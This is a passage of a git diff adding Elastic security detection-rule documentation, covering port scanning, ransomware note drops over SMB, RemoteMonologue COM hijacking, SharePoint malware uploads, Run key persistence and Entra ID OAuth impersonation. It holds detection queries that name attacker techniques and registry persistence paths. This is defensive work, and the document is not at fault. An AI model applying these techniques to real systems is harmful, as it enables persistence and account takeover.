or + process.executable like "/home/*/.local/share/JetBrains/*" + ) +| keep + @timestamp, + host.os.type, + event.type, + event.action, + destination.port, + process.executable, + destination.ip, + source.ip, + agent.id, + host.name +| stats + Esql.event_count = count(), + Esql.destination_port_count_distinct = count_distinct(destination.port), + Esql.agent_id_count_distinct = count_distinct(agent.id), + Esql.host_name_values = values(host.name), + Esql.agent_id_values = values(agent.id), + Esql.source_ip_values = values(source.ip) + by process.executable, destination.ip +| where + Esql.agent_id_count_distinct == 1 and + Esql.destination_port_count_distinct > 100 +| sort Esql.event_count asc +| limit 100 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Network Service Discovery +** ID: T1046 +** Reference URL: https://attack.mitre.org/techniques/T1046/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-ransomware-behavior-note-files-by-system.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-ransomware-behavior-note-files-by-system.asciidoc new file mode 100644 index 0000000000..2d3e1ae7f3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-ransomware-behavior-note-files-by-system.asciidoc @@ -0,0 +1,135 @@ +[[prebuilt-rule-8-19-8-potential-ransomware-behavior-note-files-by-system]] +=== Potential Ransomware Behavior - Note Files by System + +This rule identifies the creation of multiple files with same name and over SMB by the same user. This behavior may indicate the successful remote execution of a ransomware dropping file notes to different folders. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Impact +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 211 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Possible investigation steps* + + +- Investigate the content of the dropped files. +- Investigate any file names with unusual extensions. +- Investigate any incoming network connection to port 445 on this host. +- Investigate any network logon events to this host. +- Identify the total number and type of modified files by pid 4. +- If the number of files is too high and source.ip connecting over SMB is unusual isolate the host and block the used credentials. +- Investigate other alerts associated with the user/host during the past 48 hours. + + +*False positive analysis* + + +- Local file modification from a Kernel mode driver. + + +*Related rules* + + +- Third-party Backup Files Deleted via Unexpected Process - 11ea6bec-ebde-4d71-a8e9-784948f8e3e9 +- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921 +- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4 +- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57 +- Potential Ransomware Note File Dropped via SMB - 02bab13d-fb14-4d7c-b6fe-4a28874d37c5 +- Suspicious File Renamed via SMB - 78e9b5d5-7c07-40a7-a591-3dbbf464c386 + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities. +- If any backups were affected: + - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.). +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-endpoint.events.file-* metadata _id, _version, _index + +// filter for file creation event done remotely over SMB with common user readable file types used to place ransomware notes +| where event.category == "file" and host.os.type == "windows" and event.action == "creation" and process.pid == 4 and user.id != "S-1-5-18" and + file.extension in ("txt", "htm", "html", "hta", "pdf", "jpg", "bmp", "png", "pdf") + +// truncate the timestamp to a 60-second window +| eval Esql.time_window_date_trunc = date_trunc(60 seconds, @timestamp) + +| keep file.path, file.name, process.entity_id, Esql.time_window_date_trunc + +// filter for same file name dropped in at least 3 unique paths by the System virtual process +| stats Esql.file_path_count_distinct = COUNT_DISTINCT(file.path), Esql.file_path_values = VALUES(file.path) by process.entity_id , file.name, Esql.time_window_date_trunc +| where Esql.file_path_count_distinct >= 3 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SMB/Windows Admin Shares +** ID: T1021.002 +** Reference URL: https://attack.mitre.org/techniques/T1021/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-remotemonologue-attack.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-remotemonologue-attack.asciidoc new file mode 100644 index 0000000000..a75c69fa37 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-remotemonologue-attack.asciidoc @@ -0,0 +1,157 @@ +[[prebuilt-rule-8-19-8-potential-remotemonologue-attack]] +=== Potential RemoteMonologue Attack + +Identifies attempt to perform session hijack via COM object registry modification by setting the RunAs value to Interactive User. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.registry-* +* endgame-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-windows.sysmon_operational-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions#1 +* https://github.com/xforcered/RemoteMonologue + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Data Source: Elastic Endgame +* Data Source: Microsoft Defender for Endpoint +* Data Source: SentinelOne +* Data Source: Sysmon +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential RemoteMonologue Attack* + + + + +*Possible investigation steps* + + +- Review the registry event logs to confirm the modification of the RunAs value in the specified registry paths, ensuring the change was not part of a legitimate administrative action. +- Identify the user account and process responsible for the registry modification by examining the event logs for associated user and process information. +- Check for any recent remote authentication attempts or sessions on the affected host to determine if this activity is associated with lateral movement or not. +- Investigate the timeline of the registry change to correlate with any other suspicious activities or alerts on the host, such as the execution of unusual processes or network connections. + + +*False positive analysis* + + +- Software updates or installations that modify COM settings. +- Automated scripts or management tools that adjust COM configurations. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary. +- Modify the registry value back to its secure state, ensuring that "RunAs" value is not set to "Interactive User". +- Conduct a thorough review of recent user activity and system logs to identify any unauthorized access or changes made during the period NLA was disabled. +- Reset passwords for all accounts that have accessed the affected system to mitigate potential credential compromise. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected. +- Implement enhanced monitoring on the affected system and similar endpoints to detect any further attempts to disable NLA or other suspicious activities. + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.action != "deletion" and + registry.value == "RunAs" and registry.data.strings : "Interactive User" and + + not + ( + ( + process.executable : ( + "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.*\\MsMpEng.exe", + "C:\\Program Files\\Windows Defender\\MsMpEng.exe" + ) and + registry.path : "*\\SOFTWARE\\Classes\\AppID\\{1111A26D-EF95-4A45-9F55-21E52ADF9887}\\RunAs" + ) or + ( + process.executable : ( + "C:\\Program Files\\TeamViewer\\TeamViewer.exe", + "C:\\Program Files (x86)\\TeamViewer\\TeamViewer.exe" + ) and + registry.path : "*\\SOFTWARE\\Classes\\AppID\\{850A928D-5456-4865-BBE5-42635F1EBCA1}\\RunAs" + ) or + ( + process.executable : "C:\\Windows\\System32\\svchost.exe" and + registry.path : "*\\S-1-*Classes\\AppID\\{D3E34B21-9D75-101A-8C3D-00AA001A1652}\\RunAs" + ) or + ( + process.executable : "C:\\Windows\\System32\\SecurityHealthService.exe" and + registry.path : ( + "*\\SOFTWARE\\Classes\\AppID\\{1D278EEF-5C38-4F2A-8C7D-D5C13B662567}\\RunAs", + "*\\SOFTWARE\\Classes\\AppID\\{7E55A26D-EF95-4A45-9F55-21E52ADF9878}\\RunAs" + ) + ) or + ( + process.executable : "C:\\Windows\\System32\\SecurityHealthService.exe" and + registry.path : ( + "*\\SOFTWARE\\Classes\\AppID\\{1D278EEF-5C38-4F2A-8C7D-D5C13B662567}\\RunAs", + "*\\SOFTWARE\\Classes\\AppID\\{7E55A26D-EF95-4A45-9F55-21E52ADF9878}\\RunAs" + ) + ) or + registry.path : ( + "HKLM\\SOFTWARE\\Microsoft\\Office\\ClickToRun\\VREGISTRY_*", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Office\\ClickToRun\\VREGISTRY_*" + ) or + (process.executable : "C:\\windows\\System32\\msiexec.exe" and ?user.id : "S-1-5-18") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-sharepoint-malware-file-upload.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-sharepoint-malware-file-upload.asciidoc new file mode 100644 index 0000000000..26196a76e2 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-sharepoint-malware-file-upload.asciidoc @@ -0,0 +1,127 @@ +[[prebuilt-rule-8-19-8-sharepoint-malware-file-upload]] +=== SharePoint Malware File Upload + +Identifies the occurence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Tactic: Lateral Movement +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating SharePoint Malware File Upload* + + +SharePoint, a collaborative platform, facilitates file sharing and storage within organizations. Adversaries exploit this by uploading malware, leveraging the platform's sharing capabilities to propagate threats laterally. The detection rule identifies when SharePoint's file scanning engine flags an upload as malicious, focusing on specific audit events to alert security teams of potential lateral movement threats. + + +*Possible investigation steps* + + +- Review the specific event details in the alert, focusing on the event.dataset, event.provider, event.code, and event.action fields to confirm the alert is related to a SharePoint file upload flagged as malware. +- Identify the user account associated with the file upload by examining the audit logs and determine if the account has a history of suspicious activity or if it has been compromised. +- Analyze the file metadata, including the file name, type, and size, to gather more context about the nature of the uploaded file and assess its potential impact. +- Check the file's sharing permissions and access history to identify other users or systems that may have interacted with the file, assessing the risk of lateral movement. +- Investigate the source of the file upload, such as the originating IP address or device, to determine if it aligns with known malicious activity or if it is an anomaly for the user. +- Coordinate with the IT team to isolate affected systems or accounts if necessary, and initiate a response plan to mitigate any potential spread of the malware within the organization. + + +*False positive analysis* + + +- Legitimate software updates or patches uploaded to SharePoint may be flagged as malware. To handle this, create exceptions for known update files by verifying their source and hash. +- Internal security tools or scripts used for testing purposes might trigger false positives. Maintain a list of these tools and exclude them from alerts after confirming their legitimacy. +- Files with encrypted content, such as password-protected documents, can be mistakenly identified as malicious. Implement a process to review and whitelist these files if they are from trusted sources. +- Large batch uploads from trusted departments, like IT or HR, may occasionally be flagged. Establish a review protocol for these uploads and whitelist them if they are verified as safe. +- Files with macros or executable content used in legitimate business processes might be detected. Work with relevant departments to identify and exclude these files from alerts after thorough validation. + + +*Response and remediation* + + +- Immediately isolate the affected SharePoint site or library to prevent further access and sharing of the malicious file. This can be done by restricting permissions or temporarily disabling access to the site. +- Notify the security operations team and relevant stakeholders about the detected malware to ensure awareness and initiate a coordinated response. +- Quarantine the identified malicious file to prevent it from being accessed or executed by users. Use SharePoint's built-in capabilities or integrated security tools to move the file to a secure location. +- Conduct a thorough scan of the affected SharePoint site and connected systems to identify any additional malicious files or indicators of compromise. Use advanced threat detection tools to ensure comprehensive coverage. +- Review and revoke any unauthorized access or sharing permissions that may have been granted to the malicious file, ensuring that only legitimate users have access to sensitive data. +- Escalate the incident to the incident response team if there are signs of lateral movement or if the malware has spread to other parts of the network, following the organization's escalation protocols. +- Implement enhanced monitoring and logging for SharePoint and related services to detect any future attempts to upload or share malicious files, leveraging the specific query fields used in the detection rule. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePointFileOperation and event.action:FileMalwareDetected + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Taint Shared Content +** ID: T1080 +** Reference URL: https://attack.mitre.org/techniques/T1080/ +* Tactic: +** Name: Resource Development +** ID: TA0042 +** Reference URL: https://attack.mitre.org/tactics/TA0042/ +* Technique: +** Name: Stage Capabilities +** ID: T1608 +** Reference URL: https://attack.mitre.org/techniques/T1608/ +* Sub-technique: +** Name: Upload Malware +** ID: T1608.001 +** Reference URL: https://attack.mitre.org/techniques/T1608/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-startup-or-run-key-registry-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-startup-or-run-key-registry-modification.asciidoc new file mode 100644 index 0000000000..6616646522 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-startup-or-run-key-registry-modification.asciidoc @@ -0,0 +1,187 @@ +[[prebuilt-rule-8-19-8-startup-or-run-key-registry-modification]] +=== Startup or Run Key Registry Modification + +Identifies run key or startup key registry modifications. In order to survive reboots and other system interrupts, attackers will modify run keys within the registry or leverage startup folder items as a form of persistence. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.registry-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 118 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Startup or Run Key Registry Modification* + + +Adversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + + +*False positive analysis* + + +- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign. + + +*Related rules* + + +- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff +- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0 +- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f +- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type == "change" and + registry.data.strings != null and registry.hive : ("HKEY_USERS", "HKLM") and + registry.path : ( + /* Machine Hive */ + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\*", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\*", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\\*", + /* Users Hive */ + "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*", + "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\*", + "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\*", + "HKEY_USERS\\*\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\\*" + ) and + /* add common legitimate changes without being too restrictive as this is one of the most abused AESPs */ + not registry.data.strings : "ctfmon.exe /n" and + not (registry.value : "Application Restart #*" and process.name : "csrss.exe") and + not user.id : ("S-1-5-18", "S-1-5-19", "S-1-5-20") and + not registry.data.strings : ("*:\\Program Files\\*", + "*:\\Program Files (x86)\\*", + "*:\\Users\\*\\AppData\\Local\\*", + "* --processStart *", + "* --process-start-args *", + "ms-teamsupdate.exe -UninstallT20", + " ", + "grpconv -o", "* /burn.runonce*", "* /startup", + "?:\\WINDOWS\\SysWOW64\\Macromed\\Flash\\FlashUtil32_*_Plugin.exe -update plugin") and + not process.executable : ("?:\\Windows\\System32\\msiexec.exe", + "?:\\Windows\\SysWOW64\\msiexec.exe", + "D:\\*", + "\\Device\\Mup*", + "C:\\Windows\\SysWOW64\\reg.exe", + "C:\\Windows\\System32\\changepk.exe", + "C:\\Windows\\System32\\netsh.exe", + "C:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe", + "C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe", + "C:\\Program Files\\Cisco Spark\\CiscoCollabHost.exe", + "C:\\Sistemas\\Programas MP\\CCleaner\\CCleaner64.exe", + "C:\\Program Files (x86)\\FastTrack Software\\Admin By Request\\AdminByRequest.exe", + "C:\\Program Files (x86)\\Exclaimer Ltd\\Cloud Signature Update Agent\\Exclaimer.CloudSignatureAgent.exe", + "C:\\ProgramData\\Lenovo\\Vantage\\AddinData\\LenovoBatteryGaugeAddin\\x64\\QSHelper.exe", + "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\*\\Installer\\setup.exe", + "C:\\ProgramData\\bomgar-scc-*\\bomgar-scc.exe", + "C:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil*_pepper.exe", + "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\*.EXE", + "C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\*\\AdobeARM.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Registry Run Keys / Startup Folder +** ID: T1547.001 +** Reference URL: https://attack.mitre.org/techniques/T1547/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-entra-id-oauth-user-impersonation-scope-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-entra-id-oauth-user-impersonation-scope-detected.asciidoc new file mode 100644 index 0000000000..5f959dfa98 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-entra-id-oauth-user-impersonation-scope-detected.asciidoc @@ -0,0 +1,142 @@ +[[prebuilt-rule-8-19-8-suspicious-entra-id-oauth-user-impersonation-scope-detected]] +=== Suspicious Entra ID OAuth User Impersonation Scope Detected + +Identifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing user_impersonation for a token issued by Entra ID. Adversaries may use this scope to gain unauthorized access to user accounts, particularly when the sign-in session status is unbound, indicating that the session is not associated with a specific device or session. This behavior is indicative of potential account compromise or unauthorized access attempts. This rule flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/Flangvik/TeamFiltration +* https://www.proofpoint.com/us/blog/threat-insight/attackers-unleash-teamfiltration-account-takeover-campaign + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Use Case: Threat Detection +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-In Logs +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating Suspicious Entra ID OAuth User Impersonation Scope Detected* + + +Identifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing `user_impersonation`, and a token issuer type of `AzureAD`. This rule is designed to detect suspicious +OAuth user impersonation attempts in Microsoft Entra ID, particularly those involving the `user_impersonation` scope, which is often used by adversaries to gain unauthorized access to user accounts. The rule focuses on sign-in events where +the sign-in session status is `unbound`, indicating that the session is not associated with a specific device or session, making it more vulnerable to abuse. This behavior is indicative of potential account compromise or +unauthorized access attempts, especially when the user type is `Member` and the sign-in outcome is `success`. The rule aims to identify these events to facilitate timely investigation and response to potential security incidents. This is a New Terms rule that flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity. + + +*Possible investigation steps* + + +- Review the `azure.signinlogs.properties.user_principal_name` field to identify the user principal involved in the OAuth workflow. +- Check the `azure.signinlogs.properties.authentication_processing_details.Oauth Scope Info` field for the presence of `user_impersonation`. This scope is commonly used in OAuth flows to allow applications to access user resources on behalf of the user. +- Confirm that the `azure.signinlogs.properties.authentication_requirement` is set to `singleFactorAuthentication`, indicating that the sign-in did not require multi-factor authentication (MFA). This can be a red flag, as MFA is a critical security control that helps prevent unauthorized access. +- Review the `azure.signinlogs.properties.app_display_name` or `azure.signinlogs.properties.app_id` to identify the application involved in the OAuth workflow. Check if this application is known and trusted, or if it appears suspicious or unauthorized. FOCI applications are commonly abused by adversaries to evade security controls or conditional access policies. +- Analyze the `azure.signinlogs.properties.client_ip` to determine the source of the sign-in attempt. Look for unusual or unexpected IP addresses, especially those associated with known malicious activity or geographic locations that do not align with the user's typical behavior. +- Examine the `azure.signinlogs.properties.resource_display_name` or `azure.signinlogs.properties.resource_id` to identify the resource being accessed during the OAuth workflow. This can help determine if the access was legitimate or if it targeted sensitive resources. It may also help pivot to other related events or activities. +- Use the `azure.signinlogs.properties.session_id` or `azure.signinlogs.properties.correlation_id` to correlate this event with other related sign-in events or activities. This can help identify patterns of suspicious behavior or potential account compromise. + + +*False positive analysis* + + +- Some legitimate applications may use the `user_impersonation` scope for valid purposes, such as accessing user resources on behalf of the user. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals. +- Users may occasionally authenticate using single-factor authentication for specific applications or scenarios, especially in environments where MFA is not enforced or required. If this is expected behavior, consider adjusting the rule or adding exceptions for specific user principals or applications. +- Some applications may use the `user_impersonation` scope for legitimate purposes, such as accessing user resources in a controlled manner. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals. + + +*Response and remediation* + + +- Contact the user to validate the OAuth workflow and assess whether they were targeted or tricked by a malicious actor. +- If the OAuth workflow is confirmed to be malicious: + - Block the user account and reset the password to prevent further unauthorized access. + - Revoke active sessions and refresh tokens associated with the user principal. + - Review the application involved in the OAuth workflow and determine if it should be blocked or removed from the tenant. + - Investigate the source of the sign-in attempt, including the application and IP address, to determine if there are any additional indicators of compromise or ongoing malicious activity. + - Monitor the user account and related resources for any further suspicious activity or unauthorized access attempts, and take appropriate actions to mitigate any risks identified. +- Educate users about the risks associated with OAuth user impersonation and encourage them to use more secure authentication methods, such as OAuth 2.0 or OpenID Connect, whenever possible. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: azure.signinlogs and + azure.signinlogs.properties.authentication_processing_details: *user_impersonation* and + azure.signinlogs.properties.authentication_requirement: "singleFactorAuthentication" and + azure.signinlogs.properties.token_issuer_type: "AzureAD" and + azure.signinlogs.properties.token_protection_status_details.sign_in_session_status: "unbound" and + azure.signinlogs.properties.user_type: "Member" and + event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** 